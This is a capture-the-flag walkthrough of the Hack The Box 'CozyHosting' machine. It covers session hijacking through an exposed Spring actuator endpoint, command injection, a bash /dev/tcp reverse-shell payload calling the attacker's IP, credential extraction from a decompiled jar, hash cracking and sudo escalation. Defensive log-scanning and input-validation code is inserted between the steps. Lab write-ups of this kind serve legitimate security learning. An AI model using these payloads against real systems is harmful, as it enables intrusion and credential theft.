Machine Name: CozyHosting

Ashish Raosahab
6 min read · Sep 26, 2023


Difficulty level: Easy

CozyHosting is a cybersecurity challenge where you explore a computer system, like a video game. It’s a safe way to learn about hacking and fixing security issues. Your mission is to find and solve problems to become a cybersecurity pro while having fun in this controlled environment.

Join us in conquering the ‘CozyHosting’ machine (IP: 10.10.11.230) on Hack The Box. This beginner-friendly challenge offers a collaborative learning experience where we discuss tools and techniques in a friendly manner. Come be a part of this exciting journey, combining fun and knowledge!

Nmap

As a first step, we check the target IP with Nmap. We use the command ‘sudo nmap -sVC [target IP]’ to find out which ports are open and what services are running on the target machine. It’s like peering through the door to see what’s inside.

We have identified four open ports on the target machine: SSH (port 22), HTTP (port 80), port 4567, and port 8000. We’ll begin our exploration by focusing on port 80, which typically hosts web services. This is a common starting point for further investigation.

On the login page I first tried common credentials such as admin/admin and root/admin, with no luck. Then I did the following 👀👇.

Now it’s time to look for hidden directories, so the command we use is “dirsearch -u http://cozyhosting.htb/” 👀👇.

I had already tried the “/admin” directory, but it just sends me to the login page. Then I tried to access “/actuator/sessions” and, guess what, I found the username “kanderson” next to a value, “ABB0527C3FF2088EACD54106EB67A5B5”, that I did not recognise at first. So I tried to enter the /admin directory again and captured that request in Burp.

From the captured request we can see that this value is a JSESSIONID. So we replace our own JSESSIONID with kanderson’s JSESSIONID, request the “/admin” directory again and try to access it.

Boom 💥 🤯, we are inside the website.
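From the defender’s side, the step just described (an unauthenticated /actuator/sessions endpoint handing out a session id, and that id then being replayed from another client) leaves a trace in the web server’s access logs. The following is an added example, not code from this post or from the box, that scans constructed log lines in a simplified format for actuator requests and for session ids used from more than one client IP:

```python
import re
from collections import defaultdict

# Constructed sample log lines in a simplified format: ip "METHOD path" status "JSESSIONID=<id>".
# These are not real logs from the box. The third line replays the second line's session id
# from a different client, which is what a hijacked JSESSIONID looks like in a log.
SAMPLE_LOG = """\
10.10.14.5 "GET /actuator/sessions" 200 "JSESSIONID=-"
192.168.1.20 "GET /admin" 200 "JSESSIONID=5E1F2A9C0B3D4E6F7A8B9C0D1E2F3A4B"
10.10.14.5 "GET /admin" 200 "JSESSIONID=5E1F2A9C0B3D4E6F7A8B9C0D1E2F3A4B"
192.168.1.20 "GET /login" 200 "JSESSIONID=-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) "JSESSIONID=(?P<sid>[^"]*)"$'
)


def parse_line(line):
    """Parse one simplified log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def find_actuator_requests(log_text):
    """Return (client ip, path) for every request to a Spring Boot actuator endpoint.
    Any hit from an untrusted network deserves an alert: these endpoints should not be
    reachable without authentication."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"].startswith("/actuator"):
            hits.append((rec["ip"], rec["path"]))
    return hits


def find_shared_sessions(log_text):
    """Return {session id: sorted client ips} for every session id seen from more than one ip."""
    ips_by_sid = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["sid"] not in ("", "-"):
            ips_by_sid[rec["sid"]].add(rec["ip"])
    return {sid: sorted(ips) for sid, ips in ips_by_sid.items() if len(ips) > 1}


if __name__ == "__main__":
    print(find_actuator_requests(SAMPLE_LOG))
    print(find_shared_sessions(SAMPLE_LOG))
```

Session ids that legitimately move between IPs (mobile clients, NAT changes) also trigger the second check, so treat it as a triage signal rather than a verdict.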

I scrolled down and saw a form asking for a hostname and a username, so I entered the hostname and username that we found above 👆.

I got DENY. So I removed the username and, guess what, I still got DENY, but you can 👀 that the response changed; compare both images 👀👆👇.

So I tried entering “;$whoami$” here.

I did not get a proper answer, but it confirmed that this was a command injection.
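The hostname/username form above is exactly the kind of input that ends up inside a shell command. As an added example (not the box’s code; the post does not show how the application builds its command, so the ssh invocation here is an assumption), the vulnerable string-building pattern is shown beside a hardened version that allow-lists both fields and passes an argument list instead of a shell string:

```python
import re

# Allow-list patterns (an assumed policy for this example): DNS-style hostname labels and a
# conservative Unix username. Both reject shell metacharacters and a leading '-', so a value
# can neither break out of the command nor be read by ssh as an extra option.
HOSTNAME_RE = re.compile(
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def build_command_unsafe(hostname, username):
    """Vulnerable pattern: the fields are concatenated into one string that a shell will
    parse (shell=True, 'bash -c', ...), so ';', '`' or '$(...)' in the input become extra
    commands. Returned as a string here instead of being executed."""
    return f"ssh {username}@{hostname} uptime"


def build_command_safe(hostname, username):
    """Hardened: validate each field against its allow-list, then return an argv list.
    Handed to subprocess.run without shell=True, such a list goes straight to execve,
    so no shell ever interprets the values."""
    if len(hostname) > 253 or not HOSTNAME_RE.fullmatch(hostname):
        raise ValueError("invalid hostname")
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("invalid username")
    return ["ssh", f"{username}@{hostname}", "uptime"]


def is_injection_attempt(value):
    """Cheap detection rule for a field that should only hold a hostname or username:
    any shell metacharacter is a strong signal worth logging and alerting on."""
    return any(c in value for c in ";|&`$(){}<>\n")


if __name__ == "__main__":
    print(build_command_unsafe("host;id", "app"))          # the ';' survives into the shell string
    print(build_command_safe("cozyhosting.htb", "kanderson"))
    print(is_injection_attempt(";$whoami$"))
```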

So now it’s time to use netcat to get a connection; I did the following 👀👇. I used the payload {;`(bash)0>/dev/tcp/10.10.16.16/1234`} for the connection and, boom, you can see I am connected. The usual reverse-shell payload is “bash -i >& /dev/tcp/10.0.0.1/4242 0>&1”, but I did not use the 0>&1 part.

Note: it takes some time; if you get an error, send it again.

So I tried this command: “exec >&0”.

The command exec >&0 redirects the standard output (stdout) of the current shell to wherever file descriptor 0 (stdin) currently points. Because the payload above redirected stdin from the /dev/tcp connection, any output produced by commands run in the shell is now sent back over that same connection instead of being lost.

Here’s a breakdown of what this command does:

  • exec: a shell builtin; used with only a redirection and no command, it applies that redirection to the current shell itself.
  • >: output redirection of stdout.
  • &0: duplicate file descriptor 0, which is standard input (stdin), rather than opening a file.

Then I used “script /dev/null -c bash”.

The command script /dev/null -c bash starts a script session, a tool that normally records the input and output of a shell session. It is used here because script allocates a pseudo-terminal, which turns the bare reverse shell into a properly interactive one. Here’s how it works:

  1. script: This is the command to start a new script session.
  2. /dev/null: This tells script to write its typescript log to the null device, so nothing is recorded on disk.
  3. -c bash: This part specifies the command that you want to run within the script session. In this case, it's launching a new Bash shell.

I have successfully obtained the “kanderson” shell. Now our objective is to retrieve the user flag; however, there is another user, “josh”, whose files I lack the permissions to access. Nevertheless, we have located a file named “cloudhosting-0.0.1.jar”. To proceed, we transfer this file to our own machine using a Python web server. 👀👇

We decompiled the .jar file with the online tool at https://jdec.app/. Remarkably, it contains both a username and a password, and it also shows that this machine uses a PostgreSQL database.

The username is postgres and the password is Vg&nvzAQ7XxR.

Now we need to connect to the cozyhosting database with the command “\c cozyhosting”, then use “\d” to list all tables.

Use “\q” to quit.

Now we run this query: {select * from users ;}.

$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm

Now we will use the ‘John the Ripper’ tool to crack the hash of ‘admin’. First, we need to save the hash in a file.

hash=manchesterunited

Now that we have cracked the hash and the password is ‘manchesterunited’, it’s time to establish an SSH connection with the command ‘ssh josh@10.10.11.230’.

user flag “7da99d1778329fd15fbe101239f59ffa”

Let’s proceed to obtain the root flag. First we check what permissions josh has.

I noticed that SSH can be run with root permissions, so I use this payload 👀👇.

Boom 💥 🤯, we’ve successfully obtained the root flag!

If you have found the information valuable, I encourage your interest and engagement! Should you have any further questions or require additional assistance, please don’t hesitate to reach out to me through my Twitter account: https://twitter.com/AshishRaosahab6 or connect with me on LinkedIn: https://www.linkedin.com/in/ashish-yadav-120051267/. I am more than willing to offer any necessary support or provide clarification.
